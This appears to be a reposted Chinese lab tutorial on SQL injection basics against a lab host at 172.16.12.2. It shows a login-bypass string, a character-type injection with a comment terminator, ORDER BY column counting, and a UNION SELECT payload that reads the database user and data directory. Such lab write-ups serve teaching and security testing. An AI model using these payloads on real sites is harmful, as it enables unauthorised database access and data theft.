SQL注入之注入原理
Posted 星球守护者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之注入原理相关的知识,希望对你有一定的参考价值。
注入原理-基础实验
实验内容
1、访问172.16.12.2
2、万能密码登录 'or 1=1#
3、登陆后有两个注入实验,进行手工注入
实验一:字符型注入
使用hackbar输入?id=1’,查看报错回显,提示多了个分号 ’
所以payload就可以这么写,用%23将后面内注释掉即可
Payload:
http://172.16.12.2/string.php?id=1'%23
5、成功
实验二:联合注入
使用hackbar输入 ?id=1’,查看报错回显,提示多了个分号 ’
将分号 '去除,成功 Payload:
http://172.16.12.2/number.php?id=1%23 发现页面正常
7、判断列数 Payload:
http://172.16.12.2/number.php?id=1 order by 3 %23 页面没有报错
http://172.16.12.2/number.php?id=1 order by 4 %23 页面报错
8、使用联合查询语句,查询信息 Payload:
?id=-1 union select 1,current_user(),@@datadir #
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
以上是关于SQL注入之注入原理的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段